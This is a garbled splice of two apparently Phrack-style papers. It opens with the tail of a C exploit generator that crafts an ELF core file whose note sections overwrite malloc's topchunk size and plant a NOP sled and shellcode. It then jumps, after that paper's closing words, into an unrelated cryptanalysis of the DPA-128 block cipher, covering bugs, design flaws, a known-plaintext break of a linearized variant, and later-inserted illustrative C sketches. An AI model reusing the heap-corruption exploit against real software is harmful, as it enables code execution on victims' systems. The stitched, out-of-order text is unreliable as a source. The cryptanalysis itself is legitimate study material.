                if (left_bytes > 31) {
                        // filename == 31
                        elfshdr->sh_offset = OFFSET_31_BYTES;
                        left_bytes -= 31;
                } else if (left_bytes != 0) {
                        // filename < 31 && != 0
                        elfshdr->sh_offset = OFFSET_N_BYTES;
                        left_bytes = 0;
                } else {
                        // filename == 0
                        elfshdr->sh_offset = OFFSET_0_BYTES;
                }

                // The first section header will also let us load
                // the shellcode in memory :)
                // Indeed, by requesting a large memory block,
                // the topchunk will be splitted, and this memory region
                // will be left untouched until we need it.
                // We assume its name is 31 bytes long.
                if (i == 0) {
                        elfshdr->sh_size = 4096;
                        elfshdr->sh_offset = OFFSET_SHELLCODE;
                }

                elfshdr++;
        }

        // This section header entry is for the data that will
        // overwrite the topchunk size pointer
        elfshdr->sh_name        = 0;
        elfshdr->sh_type        = 7;    // SHT_NOTE
        elfshdr->sh_flags       = 0;
        elfshdr->sh_addr        = 0;
        elfshdr->sh_offset      = OFFSET_OVERWRITE;
        elfshdr->sh_size        = 256;
        elfshdr->sh_link        = 0;
        elfshdr->sh_info        = 0;
        elfshdr->sh_addralign   = 0;
        elfshdr->sh_entsize     = 0;
        elfshdr++;

        // This section header entry triggers the call to malloc
        // with a user supplied length.
        // It is a requirement for the set_head technique to work
        elfshdr->sh_name        = 0;
        elfshdr->sh_type        = 7;    // SHT_NOTE
        elfshdr->sh_flags       = 0;
        elfshdr->sh_addr        = 0;
        elfshdr->sh_offset      = OFFSET_N_BYTES;
        elfshdr->sh_size        = malloc_size;
        elfshdr->sh_link        = 0;
        elfshdr->sh_info        = 0;
        elfshdr->sh_addralign   = 0;
        elfshdr->sh_entsize     = 0;
        elfshdr++;

        // This note entry lets us eat 31 bytes + overhead
        elfnhdr = (Elf32_Nhdr *) (buffer + OFFSET_31_BYTES);
        elfnhdr->n_namesz = 12;
        elfnhdr->n_descsz = 12;
        elfnhdr->n_type = 1;
        ptr = buffer + OFFSET_31_BYTES + 12;
        sprintf (ptr, "NetBSD-CORE");
        sprintf (buffer + OFFSET_31_BYTES + 24 + 0x7c,
                "BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB");


        // This note entry lets us eat an arbitrary number of bytes + overhead
        elfnhdr = (Elf32_Nhdr *) (buffer + OFFSET_N_BYTES);
        elfnhdr->n_namesz = 12;
        elfnhdr->n_descsz = 12;
        elfnhdr->n_type = 1;
        ptr = buffer + OFFSET_N_BYTES + 12;
        sprintf (ptr, "NetBSD-CORE");
        for (i = 0; i < (math->nname % 31); i++)
                buffer[OFFSET_N_BYTES+24+0x7c+i]='B';

        // This note entry lets us eat 0 bytes + overhead
        elfnhdr = (Elf32_Nhdr *) (buffer + OFFSET_0_BYTES);
        elfnhdr->n_namesz = 12;
        elfnhdr->n_descsz = 12;
        elfnhdr->n_type = 1;
        ptr = buffer + OFFSET_0_BYTES + 12;
        sprintf (ptr, "NetBSD-CORE");
        buffer[OFFSET_0_BYTES+24+0x7c]=0;

        // This note entry lets us specify the value that will
        // overwrite the topchunk size
        elfnhdr = (Elf32_Nhdr *) (buffer + OFFSET_OVERWRITE);
        elfnhdr->n_namesz = 12;
        elfnhdr->n_descsz = 12;
        elfnhdr->n_type = 1;
        ptr = buffer + OFFSET_OVERWRITE + 12;
        sprintf (ptr, "NetBSD-CORE");
        // Put the new topchunk size 7 times in memory
        // The note entry program name is at a specific, odd offset (24+0x7c)?
        for (i = 0; i < 7; i++)
                put_longword (buffer + OFFSET_OVERWRITE + 24 + 0x7c + (i * 4),
                        topchunk_size);

        // This note entry lets us eat 31 bytes + overhead, but
        // its real purpose is to load the shellcode in memory.
        // We assume that its name is 31 bytes long.
        elfnhdr = (Elf32_Nhdr *) (buffer + OFFSET_SHELLCODE);
        elfnhdr->n_namesz = 12;
        elfnhdr->n_descsz = 12;
        elfnhdr->n_type = 1;
        ptr = buffer + OFFSET_SHELLCODE + 12;
        sprintf (ptr, "NetBSD-CORE");
        sprintf (buffer + OFFSET_SHELLCODE + 24 + 0x7c,
                "BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB");

        // Fill this memory region with our shellcode.
        // Remember to leave the note entry untouched ...
        memset (buffer + OFFSET_SHELLCODE + 256, 0x90, 4096-256);
        sprintf (buffer + 8191 - strlen (scode), scode);

        fp = open_file (filename);

        if (fwrite (buffer, 8192, 1, fp) != 0 ) {
                printf ("--[ The file has been written\n");
        } else {
                printf ("--[ Can not write to the file\n");
                exit (1);
        }
        fclose (fp);

        free (shead);
        free (math);
        free (buffer);
        free (filename);

        return 0;
}

--[ 7 - Final words


That’s all for the details of this technique; a lot has already been said 
through this paper. By looking at the complexity of the malloc code, there 
are probably many other ways to take control of a process by corrupting the 
malloc chunks. 


--[ 1 - Introduction


While the cracking scene has grown up with cryptology thanks to the
evolution of binary protection schemes, the hacking scene mostly hasn’t.
This is largely explained by the fact that there was, on the whole, no real
need. Indeed it’s well known that if a hacker needs to decrypt some files
then he will hack into the box of their owner, backdoor the system and then
use it to steal the key. A cracker who needs to break a protection scheme
will not have the same approach: he will usually try to understand it fully
in order to find and exploit design and/or implementation flaws.


Although the growth of the security industry in recent years has changed
the situation a little regarding the hacking community, nowadays there
are still too many people with weak knowledge of this science. What is
disturbing is the spreading of urban legends and other hoaxes by some
paranoids among them. For example, haven’t you ever heard people claiming
that government agencies were able to break RSA or AES? A much more clever
question would have been: what does "break" mean?


A good example of paranoid reaction can be found in M11tOn’s article
[FakeP63]. The author, who is probably skilled in hacking, promotes the use
of "home made cryptographic algorithms" instead of standardized ones such
as 3DES. The corresponding argument is that since most so-called security
experts lack coding skills, they aren’t able to develop appropriate
tools for exotic ciphers. While I agree at least partially with him
regarding the coding abilities, I can’t possibly agree with the main
thesis. Indeed if some public tools are sufficient to break a 3DES based
protection then it means that a design and/or an implementation mistake
was made since, according to the state of the art, 3DES is still
unbroken. The cryptosystem was weak from the beginning and using "home
made cryptography" would only weaken it more.


It is therefore extremely important to understand cryptography and to
trust the standards. In a previous Phrack issue (Phrack 62), Veins exposed
to the hacking community a "home made" block cipher called DPA (Dynamic
Polyalphabetic Algorithms) [DPA128]. In the following paper, we are going
to analyze this cipher and demonstrate that it is not flawless - at least
from a cryptanalytic perspective - thus fitting perfectly with our talk.


--[ 2 - A short word about block ciphers


Let’s quote a little bit the excellent HAC [MenVan]:


"A block cipher is a function which maps n-bit plaintext blocks to n-bit 
ciphertext blocks; n is called the blocklength. It may be viewed as a 
simple substitution cipher with large character size. The function is 
parametrized by a k-bit key K, taking values from a subset |K (the key 
space) of the set of all k-bit vectors Vk. It is generally assumed that 
the key is chosen at random. Use of plaintext and ciphertext blocks of 
equal size avoids data expansion." 


Pretty clear isn’t it? :> So what’s the purpose of such a cryptosystem?
Obviously since we are dealing with encryption this class of algorithms
provides confidentiality. Its construction makes it particularly suitable
for applications such as the encryption of large volumes (files or HD for
example). Used in special modes such as CBC (like in OpenSSL) it can
also provide stream encryption. For example, we use AES-CBC in the WPA2,
SSL and SSH protocols.


Remark: When used in conjunction with other mechanisms, block ciphers can 
also provide services such as authentication or integrity (cf part 8 of 
the paper). 


An important point is to understand what cryptology is useful for. While
cryptography aims at designing the best algorithms, that is to say secure
and fast ones, cryptanalysis allows the evaluation of the security of those
algorithms. The more an algorithm is proved to have weaknesses, the less
we should trust it.


--[ 3 - Overview of block cipher cryptanalysis


The cryptanalysis of block ciphers evolved significantly in the 90s with
the appearance of some fundamental methods such as differential
[BiSha90] and linear [Matsui92] cryptanalysis. Together with some
more recent ones like the boomerang attack of Wagner or the chi square
cryptanalysis of Vaudenay [Vaud], they constitute the set of so-called
statistical attacks on block ciphers, as opposed to the very recent and
still controversial algebraic ones (see [CourtAlg] for more information).


Today the evolution of block cipher cryptanalysis tends to stabilize 
itself. However a cryptographer still has to acquire quite a deep knowledge 
of those attacks in order to design a cipher. Reading the Phrack paper, we 
think - actually we may be wrong - that the author mostly based his design 
on statistical tests. Although they are obviously necessary, they can’t 
possibly be enough. Every component has to be carefully chosen. We 
identified several weaknesses and think that some more may still be left. 


--[ 4 - Veins’ DPA-128 description 


DPA-128 is a 16-round block cipher providing 128-bit block encryption
using an n-bit key. Each round of encryption is composed of 3 functions,
which are rbytechain(), rbitshift() and S_E(). Thus for each input block,
we apply the E() function 16 times (one per round):


void E (unsigned char *key, unsigned char *block, unsigned int shift)
{
  rbytechain (block);
  rbitshift (block, shift);
  S_E (key, block, shift);
}


where: 


   - block is the 128b input
   - shift is a 32b parameter dependent on the round subkey
   - key is the 128b round subkey


Consequently, the mathematical description of this cipher is:

   f: |P x |K ----> |C


where: 
- |P is the set of all plaintexts 
- |K is the set of all keys 
- |C is the set of all ciphertexts 


For p element of |P, k of |K and c of |C, we have c = f(p,k)
with f = EoE...EoE = E^16 and o meaning the composition of functions.


We are now going to describe each function. Since we sometimes may need 
mathematics to do so, we will assume that the reader is familiar with 
basic algebra ;> 


rbytechain() is described by the following C function:


void rbytechain(unsigned char *block)
{
  int i;
  for (i = 0; i < DPA_BLOCK_SIZE; ++i)
    block[i] ^= block[(i + 1) % DPA_BLOCK_SIZE];
  return;
}


where:
   - block is the 128b input
   - DPA_BLOCK_SIZE equals 16


Such an operation on bytes is called linear mixing and its goal is to
provide the diffusion of information (according to the well known Shannon
theory). Mathematically, it’s no more than a linear map between two GF(2)
vector spaces of dimension 128. Indeed, if U and V are vectors over GF(2)
representing respectively the input and the output of rbytechain() then
V = M.U where M is a 128x128 matrix over GF(2) of the linear map where
coefficients of the matrix are trivial to find. Now let’s see rbitshift().
Its C version is:


void rbitshift (unsigned char *block, unsigned int shift)
{
  unsigned int i;
  unsigned int div;
  unsigned int mod;
  unsigned int rel;
  unsigned char mask;
  unsigned char remainder;
  unsigned char sblock[DPA_BLOCK_SIZE];

  if (shift)
    {
      mask = 0;
      shift %= 128;
      div = shift / 8;
      mod = shift % 8;
      rel = DPA_BLOCK_SIZE - div;
      for (i = 0; i < mod; ++i)
        mask |= (1 << i);

      for (i = 0; i < DPA_BLOCK_SIZE; ++i)
        {
          remainder =
            ((block[(rel + i - 1) % DPA_BLOCK_SIZE]) & mask) << (8 - mod);
          sblock[i] =
            ((block[(rel + i) % DPA_BLOCK_SIZE]) >> mod) | remainder;
        }
    }
  memcpy (block, sblock, DPA_BLOCK_SIZE);
}


where:
   - block is the 128b input
   - DPA_BLOCK_SIZE equals 16
   - shift is derived from the round subkey


Veins describes it in his paper as a key-related shifting (in fact it has
to be a key-related ’rotation’ since we intend to be able to decrypt the
ciphertext ;)). A careful read of the code and several tests confirmed that
it was not erroneous (up to a bug detailed later in this paper), so we can
describe it as a linear map between two GF(2) vector spaces of dimension 128.


Indeed, if V and W are vectors over GF(2) representing respectively the
input and the output of rbitshift() then:


W = M’.V where M’ is the 128x128 matrix over GF(2) of the linear
map where, unlike the previous function, coefficients of the matrix are
unknown up to a probability of 1/128 per round.


Such a function also provides diffusion of information. 
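
The linearity claimed for rbytechain() and rbitshift() can be checked
numerically. The sketch below is an illustration and not part of the DPA
sources: linear_layer_is_linear() and linearity_demo() are hypothetical
helpers, rbytechain() is assumed to XOR each byte with its right neighbour,
and rbitshift() is transcribed with one deliberate change (sblock starts as
a copy of the input) so that a shift of 0 is well defined here. It verifies
that L(a ^ b) == L(a) ^ L(b) for L = rbitshift o rbytechain.

```c
#include <assert.h>
#include <string.h>

#define DPA_BLOCK_SIZE 16

/* Assumed form of rbytechain(): each byte is XORed with its right neighbour. */
static void rbytechain(unsigned char *block)
{
    int i;
    for (i = 0; i < DPA_BLOCK_SIZE; ++i)
        block[i] ^= block[(i + 1) % DPA_BLOCK_SIZE];
}

/* rbitshift() with sblock pre-initialised (a change made for this sketch). */
static void rbitshift(unsigned char *block, unsigned int shift)
{
    unsigned int i, div, mod, rel;
    unsigned char mask = 0, remainder;
    unsigned char sblock[DPA_BLOCK_SIZE];

    memcpy(sblock, block, DPA_BLOCK_SIZE);
    shift %= 128;
    if (shift) {
        div = shift / 8;
        mod = shift % 8;
        rel = DPA_BLOCK_SIZE - div;
        for (i = 0; i < mod; ++i)
            mask |= (unsigned char)(1 << i);
        for (i = 0; i < DPA_BLOCK_SIZE; ++i) {
            remainder = (unsigned char)
                ((block[(rel + i - 1) % DPA_BLOCK_SIZE] & mask) << (8 - mod));
            sblock[i] = (unsigned char)
                ((block[(rel + i) % DPA_BLOCK_SIZE] >> mod) | remainder);
        }
    }
    memcpy(block, sblock, DPA_BLOCK_SIZE);
}

/* Returns 1 if L(a ^ b) == L(a) ^ L(b), with L = rbitshift o rbytechain. */
static int linear_layer_is_linear(const unsigned char *a,
                                  const unsigned char *b,
                                  unsigned int shift)
{
    unsigned char x[DPA_BLOCK_SIZE], y[DPA_BLOCK_SIZE], z[DPA_BLOCK_SIZE];
    int i;

    for (i = 0; i < DPA_BLOCK_SIZE; ++i) {
        x[i] = a[i];
        y[i] = b[i];
        z[i] = (unsigned char)(a[i] ^ b[i]);
    }
    rbytechain(x); rbitshift(x, shift);
    rbytechain(y); rbitshift(y, shift);
    rbytechain(z); rbitshift(z, shift);
    for (i = 0; i < DPA_BLOCK_SIZE; ++i)
        if ((unsigned char)(x[i] ^ y[i]) != z[i])
            return 0;
    return 1;
}

static void linearity_demo(void)
{
    unsigned char a[DPA_BLOCK_SIZE], b[DPA_BLOCK_SIZE];
    unsigned int s;
    int i;

    for (i = 0; i < DPA_BLOCK_SIZE; ++i) {
        a[i] = (unsigned char)(17 * i + 3);
        b[i] = (unsigned char)(91 * i + 200);
    }
    for (s = 0; s < 128; ++s)
        assert(linear_layer_is_linear(a, b, s));
}
```

A passing check on a few inputs is of course not a proof, but both
functions only move and XOR bits, which is exactly what a matrix over GF(2)
does.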


Finally, the last operation S_E() is described by the C code:


void S_E (unsigned char *key, unsigned char *block, unsigned int s)
{
  int i;
  for (i = 0; i < DPA_BLOCK_SIZE; ++i)
    block[i] = (key[i] + block[i] + s) % 256;
  return;
}


where:
   - block is the 128b input
   - DPA_BLOCK_SIZE equals 16
   - s is the shift parameter described in the previous function
   - key is the round subkey


The main idea of veins’ paper is the so-called "polyalphabetic substitution"
concept, whose implementation is supposed to be the S_E() C function.
Reading the code, it appears to be no more than a key mixing function over
GF(2^8).
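
To make the "key mixing" reading concrete, here is a small sketch showing
that S_E() is undone by a byte-wise subtraction and that only the low byte
of the shift matters. S_D() and keymix_demo() are hypothetical names
introduced for this illustration; they are not taken from the DPA sources.

```c
#include <assert.h>
#include <string.h>

#define DPA_BLOCK_SIZE 16

/* S_E() as given above. */
static void S_E(unsigned char *key, unsigned char *block, unsigned int s)
{
    int i;
    for (i = 0; i < DPA_BLOCK_SIZE; ++i)
        block[i] = (key[i] + block[i] + s) % 256;
}

/* Hypothetical inverse: subtract what S_E() added, modulo 256. */
static void S_D(unsigned char *key, unsigned char *block, unsigned int s)
{
    int i;
    for (i = 0; i < DPA_BLOCK_SIZE; ++i)
        block[i] = (unsigned char)(block[i] - key[i] - s);
}

static void keymix_demo(void)
{
    unsigned char key[DPA_BLOCK_SIZE], p[DPA_BLOCK_SIZE];
    unsigned char c1[DPA_BLOCK_SIZE], c2[DPA_BLOCK_SIZE];
    int i;

    for (i = 0; i < DPA_BLOCK_SIZE; ++i) {
        key[i] = (unsigned char)(200 + 7 * i);
        p[i]   = (unsigned char)(100 + 13 * i);
    }

    /* Round trip: S_D undoes S_E. */
    memcpy(c1, p, DPA_BLOCK_SIZE);
    S_E(key, c1, 77);
    S_D(key, c1, 77);
    assert(memcmp(c1, p, DPA_BLOCK_SIZE) == 0);

    /* Only s modulo 256 influences the output. */
    memcpy(c1, p, DPA_BLOCK_SIZE);
    memcpy(c2, p, DPA_BLOCK_SIZE);
    S_E(key, c1, 77);
    S_E(key, c2, 77 + 256);
    assert(memcmp(c1, c2, DPA_BLOCK_SIZE) == 0);
}
```

In other words each output byte is the input byte plus the constant
(key[i] + s) mod 256, so the whole function behaves like the addition of a
single 16-byte round constant.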


Remark: We shall see later the importance of the mathematical operation
known as ’addition’ over GF(2^8).


Regarding the key scheduling, each cipher round makes use of a 128b subkey
as well as of a 32b one deriving from it called "shift". The following
pseudo code describes this operation:


    skey(0) = checksum128(master_key)
    for i = 0, nbr_round-2:
        skey(i+1) = checksum128(skey(i))

    skey(0) = skey(15)
    for i = 0, nbr_round-1:
        shift(nbr_round-1 - i) = hash32(skey(i))


where skey(i) is the i’th subkey.


It is not necessary to detail checksum128() and hash32(); the reader
just has to remember this: whatever weaknesses there may be in those
functions, we will now consider them to be true one-way hash functions
providing perfect entropy.


As a conclusion, the studied cipher is close to being an SPN (Substitution
- Permutation Network) which is a very generic and well known construction
(AES is one for example).


--[ 4.1 - Bugs in the implementation 


Although veins himself honestly recognizes that the cipher may be weak and
"strongly discourages its use" to quote him [DPA128], some people could
nevertheless decide to use it as a primitive for encryption of personal
and/or sensitive data as an alternative to ’already-cracked-by-NSA’
ciphers [NSA2007]. Unfortunately for those theoretical people, we were able
to identify a bug leading to a potentially incorrect functioning of the
cryptosystem (with a non negligible probability).


We saw earlier that the bitshift code skeleton was the following: 


/* bitshift.c */
void {r,l}bitshift (unsigned char *block, unsigned int shift)
{
  [...] // SysK : local vars declaration
  unsigned char sblock[DPA_BLOCK_SIZE];

  if (shift)
    {
      [...] // SysK : sblock initialization
    }
  memcpy (block, sblock, DPA_BLOCK_SIZE);
}


Clearly, if ’shift’ is 0 then ’block’ is fed with stack content! Obviously
in such a case the cryptosystem can’t possibly work.


Since shift is an integer, such an event occurs with at least a theoretical
probability of 1/2^32 per round.
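
One possible way to remove the problem is sketched below. It is an
assumption about how a fix could look, not veins’ code: to stay short,
rbyteshift_fixed() is a simplified stand-in that rotates by whole bytes
only, and both it and shiftfix_demo() are hypothetical names. The point is
the control flow: sblock is initialised from block before the conditional,
so the final memcpy() never copies uninitialised stack bytes.

```c
#include <assert.h>
#include <string.h>

#define DPA_BLOCK_SIZE 16

/* Simplified stand-in for {r,l}bitshift(): rotates right by whole bytes. */
static void rbyteshift_fixed(unsigned char *block, unsigned int shift)
{
    unsigned char sblock[DPA_BLOCK_SIZE];
    unsigned int i;

    /* Fix: start from a copy of the input so that shift == 0 is a no-op. */
    memcpy(sblock, block, DPA_BLOCK_SIZE);

    shift %= DPA_BLOCK_SIZE;
    if (shift) {
        for (i = 0; i < DPA_BLOCK_SIZE; ++i)
            sblock[(i + shift) % DPA_BLOCK_SIZE] = block[i];
    }
    memcpy(block, sblock, DPA_BLOCK_SIZE);
}

static void shiftfix_demo(void)
{
    unsigned char ref[DPA_BLOCK_SIZE], blk[DPA_BLOCK_SIZE];
    int i;

    for (i = 0; i < DPA_BLOCK_SIZE; ++i)
        ref[i] = (unsigned char)i;

    /* shift == 0 leaves the block untouched. */
    memcpy(blk, ref, DPA_BLOCK_SIZE);
    rbyteshift_fixed(blk, 0);
    assert(memcmp(blk, ref, DPA_BLOCK_SIZE) == 0);

    /* shift == 1 moves every byte one position to the right. */
    rbyteshift_fixed(blk, 1);
    assert(blk[0] == 15 && blk[1] == 0 && blk[15] == 14);
}
```

An equivalent alternative would be to return early when the reduced shift
is 0. Either way a zero shift then means "no rotation" rather than
"garbage".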


Now let’s study the shift generation function: 


/* hash32.c */

/*
 * This function computes a 32 bits output out a variable length input. It is
 * not important to have a nice distribution and low collisions as it is used
 * on the output of checksum128() (see checksum128.c). There is a requirement
 * though, the function should not consider \0 as a key terminator.
 */

unsigned long hash32 (unsigned char *k, unsigned int length)
{
  unsigned long h;

  for (h = 0; *k && length; ++k, --length)
    h = 13 * h + *k;
  return (h);
}


As stated in the C code comment, hash32() is the function which produces
the shift. Although the author is careful and admits that the output
distribution may not be completely uniform (not exactly equal probability
for each byte value to appear), it is obvious that a strong bias is not
desirable (Cf 7.3).


However, what happens if the first byte pointed to by k is 0? Since the loop
ends as soon as *k is equal to 0, h keeps its initial value 0. Assuming
that the underlying subkey is truly random, such an event should occur with
a probability of 1/256 (instead of 1/2^32). Since the output of hash32() is
supposed to be a 32 bits integer and the comment explicitly requires that \0
not be treated as a terminator, this is clearly a bug.

We could be tempted to think that this implementation failure leads to a
weakness but a short look at the code tells us that:


struct s_dpa_sub_key {
    unsigned char key[DPA_KEY_SIZE];
    unsigned char shift;
};

typedef struct s_dpa_sub_key DPA_SUB_KEY;


Therefore since shift is a char object, the presence of "*k &&" in the code 
doesn’t change the fact that the cryptosystem will fail with a probability 
of 1/256 per round. 
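
A small sketch of the behaviour described above may help. hash32_buggy() reproduces the loop condition quoted from hash32.c; hash32_fixed() is a hypothetical correction (not taken from the DPA sources) that lets the length alone terminate the loop.

```c
/* Same loop as the quoted hash32(): stops at the first zero byte. */
unsigned long hash32_buggy(const unsigned char *k, unsigned int length)
{
    unsigned long h;

    for (h = 0; *k && length; ++k, --length)
        h = 13 * h + *k;
    return h;
}

/* Hypothetical fix: \0 is no longer treated as a terminator. */
unsigned long hash32_fixed(const unsigned char *k, unsigned int length)
{
    unsigned long h;

    for (h = 0; length; ++k, --length)
        h = 13 * h + *k;
    return h;
}
```

For a subkey whose first byte is 0, the buggy version returns 0 whatever the other 15 bytes are. Note that even with the fixed version the result is truncated to its low 8 bits when stored into the unsigned char shift field, so a shift of 0 still shows up about once every 256 subkeys.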


Since the bug may appear independently in each round, the probability of 
failure is even greater: 


    p("fail") = 1 - p("ok")
              = 1 - Mul( p("ok in round i") )
              = 1 - (255/256)^16
              = 0.0607...

where i is element of [0, (nbr_rounds - 1)]
It's not too far from 1/16 :-)
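
The figure is easy to check numerically. The helper below is only an illustration (the name failure_probability is ours); it assumes, as in the text, that each round independently gets a zero shift with probability 1/256.

```c
/* Probability that at least one of `rounds` independent shifts is 0,
 * each shift being 0 with probability 1/256. */
double failure_probability(int rounds)
{
    double ok = 1.0;
    int i;

    for (i = 0; i < rounds; ++i)
        ok *= 255.0 / 256.0;    /* p("ok in round i") */
    return 1.0 - ok;
}
```

failure_probability(16) evaluates to roughly 0.0607, slightly below 1/16 = 0.0625.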


Remark: We shall see later that the special case where shift is equal to 0 
is part of a general class of weak keys potentially allowing an attacker to 
break the cryptosystem. 


Hunting weaknesses and bugs in the implementation of cryptographic
primitives is the common job of some reverse engineers since it sometimes
allows them to break implementations of algorithms which are believed to be
theoretically secure. While those flaws mostly concern asymmetric
primitives of digital signature or key negotiation/generation, it can also
apply in some very specific cases to the block cipher world.


From now on, we will consider the annoying bug in bitshift() fixed.


--[ 4.2 - Weaknesses in the design 


When designing a block cipher, a cryptographer has to be very careful about
every detail of the algorithm. In the following section, we describe
several design mistakes and explain why, in some cases, they can reduce the
security of the cipher.


a) We saw earlier that the E() function was applied to each round. However
such a construction is not perfect regarding the first round. Since
rbytechain() is a linear mixing operation not involving key material, it
shouldn't be used as the first operation on the input buffer since its
effect on it can be completely canceled. Therefore, if a cryptanalyst wants
to attack the bitshift() component of the first round, he just has to
apply lbytechain() (the rbytechain() inverse function) to the input vector.
It would thus have been a good idea to put a key mixing as the first
operation.


b) The rbitshift() operation only needs the 7 first bits of the shift
character whereas S_E() uses all of them. It is also generally
considered a bad idea to use the same key material for several operations.


c) If for some reason the attacker is able to leak the second (not the
first) subkey, then all the key material is compromised. Of
course the master key will remain unknown because of the onewayness of
checksum128(); however we do not need to recover it in order to encrypt
and/or decrypt data.


d) In the bitshift() function, a loop is particularly interesting:

    for (i = 0; i < mod; ++i)
        mask |= (1 << i);


What is interesting is that the execution time of the loop depends on
"mod", which is derived from the shift. Therefore we conclude that this loop
probably allows a side channel attack against the cipher. Thanks to X for
having pointed this out ;>

In the computer security area, it's well known
that a single tiny mistake can lead to the total compromise of an
information system. In cryptography, the same rules apply.
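
As an illustration of point d), the sketch below puts the quoted loop next to a loop-free way of building the same mask. Both function names are ours, and the second version is only a suggestion: whether it really runs in constant time depends on the compiler and the CPU, and it assumes mod is smaller than the width of unsigned int.

```c
/* Loop from bitshift(): the number of iterations equals `mod`. */
unsigned int mask_loop(unsigned int mod)
{
    unsigned int mask = 0, i;

    for (i = 0; i < mod; ++i)
        mask |= (1u << i);
    return mask;
}

/* Same value without a data-dependent loop (assumes mod < 32). */
unsigned int mask_const(unsigned int mod)
{
    return (1u << mod) - 1u;
}
```

Since mod is at most 7 or 8 here, the closed form covers every value the cipher can produce.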


--[ 5 - Breaking the linearized version 


Even if we regret the non justification of addition operation employment,
it is not the worst choice in itself. What would have happened if the key
mixing had been done with a xor operation over GF(2^8) instead, as it is the
case in DES or AES for example?


To measure the importance of algebraic consideration in the security of a
block cipher, let's play a little bit with a linearized version of the
cipher. That is to say that we replace the S_E() function with the
following S_E2() where:


void S_E2(unsigned char *key, unsigned char *block, unsigned int s)
{
    int i;

    for (i = 0; i < DPA_BLOCK_SIZE; ++i)
        block[i] = (key[i] ^ block[i] ^ s) % 256;   /* [1] */
        // + is replaced by xor
    return;
}


If X, Y and K are vectors over GF(2^8) representing respectively the input,
the output of S_E2() and the round key material then Y = X xor K.


Remark: K = sK xor shift. We use K for simplification purpose.


Now considering the full round we have:

    V = M.U          [a] (rbytechain)
    W = M'.V         [b] (rbitshift)
    Y = W xor K      [c] (S_E2)

Linear algebra allows the composition of applications rbytechain() and
rbitshift() since the dimensions of M and M' match but W in [b] is a vector
over GF(2) whereas W in [c] is clearly over GF(2^8). However, due to the
use of XOR in [c], Y, W and K can also be seen as vectors over GF(2).
Therefore, S_E2() is a GF(2) affine map between two vector spaces of
dimension 128.

We then have:

    Y = M'.M.U xor K


The use of differential cryptanalysis will help us to get rid of the key.
Let's consider couples (U0,Y0 = E(U0)) and (U1,Y1 = E(U1)) then:

    DELTA(Y) = Y0 xor Y1
             = (M'.M.U0 xor K) xor (M'.M.U1 xor K)
             = (M'.M.U0 xor M'.M.U1) xor K xor K   (commutativity &
                                                    associativity of xor)
             = (M'.M).(U0 xor U1)                  (distributivity)
             = (M'.M).DELTA(U)


Such a result shows us that whatever sK and shift are, there is always a
linear map linking an input differential to the corresponding output
differential.

The generalization to the 16 rounds using matrix multiplication is obvious.
Therefore we have proved that there exists a 128x128 matrix Mf over GF(2)
such as DELTA(Y) = Mf.DELTA(X) for the linearized version of the cipher.


Then assuming we know one couple (U0,Y0) and Mf, we can encrypt any input U.
Indeed, Y xor Y0 = Mf.(U xor U0) therefore Y = (Mf.(U xor U0)) xor Y0.
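
The identity Y = (Mf.(U xor U0)) xor Y0 can be illustrated on a scaled-down model. The sketch below is not DPA: it is a hypothetical 8 bits affine map E(u) = Mf.u xor K, with Mf stored as 8 row bytes, and all function names are ours. It shows that somebody who knows Mf and a single couple (U0,Y0) predicts every ciphertext without ever touching K.

```c
/* Multiply an 8x8 matrix over GF(2) by the bit vector x.
 * m[r] holds row r, bit c of m[r] being the coefficient of column c. */
unsigned char gf2_mul(const unsigned char m[8], unsigned char x)
{
    unsigned char y = 0;
    int r;

    for (r = 0; r < 8; ++r) {
        unsigned char t = m[r] & x;         /* row r AND x          */
        t ^= t >> 4;                        /* fold down to parity  */
        t ^= t >> 2;
        t ^= t >> 1;
        y |= (unsigned char)((t & 1) << r); /* bit r of the product */
    }
    return y;
}

/* Toy affine "cipher": E(u) = Mf.u xor K */
unsigned char toy_encrypt(const unsigned char mf[8], unsigned char k,
                          unsigned char u)
{
    return (unsigned char)(gf2_mul(mf, u) ^ k);
}

/* Attacker side: uses Mf and one known couple (u0,y0), never K. */
unsigned char toy_predict(const unsigned char mf[8], unsigned char u0,
                          unsigned char y0, unsigned char u)
{
    return (unsigned char)(gf2_mul(mf, (unsigned char)(u ^ u0)) ^ y0);
}
```

Whatever matrix and key are chosen, toy_predict() agrees with toy_encrypt() on all 256 inputs, which is exactly the property exploited against the linearized cipher.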


Remark 1: The attack doesn’t give us the knowledge of subkeys and shifts 
but such a thing is useless. The goal of an attacker is not the key in 
itself but rather the ability of encrypting/decrypting a set of 
plaintexts/ciphertexts. Furthermore, considering the key scheduling 
operation, if we really needed to recover the master key, it would be quite 
a pain in the ass considering the fact that checksum128() is a one way 
function ;-) 


Remark 2: Obviously in order to decrypt any output Y we need to calculate
Mf^-1 which is the inverse matrix of Mf. This is somewhat more interesting,
isn't it ? :-)


Because of rbitshift(), we are unable to determine using matrix
multiplications the coefficients of Mf. An exhaustive search is of course
impossible because of the huge complexity (2^16384); however, finding them
is equivalent to solving 128 systems (1 system per row of Mf) of 128
variables (1 variable per column) in GF(2). To build such a system, we need
128 couples of (cleartext,ciphertext). The described attack was implemented
using the nice NTL library ([SHOUP]) and can be found in Annexe A of this
paper.


$ g++ break_linear.cpp bitshift.o bytechain.o key.c hash32.o checksum128.o
-o break_linear -lntl -lcrypto -I include
$ ./break_linear
[+] Generating the plaintexts / ciphertexts
[+] NTL stuff !
[+] Calculation of Mf
[+] Let's make a test !
[+] Well done boy :>


Remark: Sometimes NTL detects a linear relation between chosen inputs
(DELTA_X) and will then refuse to work. Indeed, in order to solve the 128
systems, we need a situation where all the equations are independent. If it's
not the case, then obviously det(M) is equal to 0 (for uniformly random
differences this happens roughly 71% of the time).
Since inputs are randomly generated, just try again until it works :-)


$ ./break_linear
[+] Generating the plaintexts / ciphertexts
[+] NTL stuff !
det(M) = 0


As a conclusion we saw that the linearity over GF(2) of the xor operation
allowed us to write an affine relation between two elements of GF(2)^128 in
the S_E2() function and then to easily break the linearized version using a
128 known plaintext attack. The use of non linearity is crucial in the
design. Fortunately for DPA-128, Veins chose the addition modulo 256 as the
key mixer which is naturally non linear over GF(2).


--[ 6 - On the non linearity of addition modulo n over GF(2)


The bitshift() and bytechain() functions can be described using matrices
over GF(2), therefore it is interesting to use this field for algebraic
calculations.


The difference between addition and xor laws in GF(2^n) lies in the carry
propagation:

    w(i) + k(i) = w(i) xor k(i) xor carry(i)

where w(i), k(i) and carry(i) are elements of GF(2).

We note w(i) as the i'th bit of w and will keep this notation until the end.
carry(i), written c(i) for simplification purpose, is defined recursively:

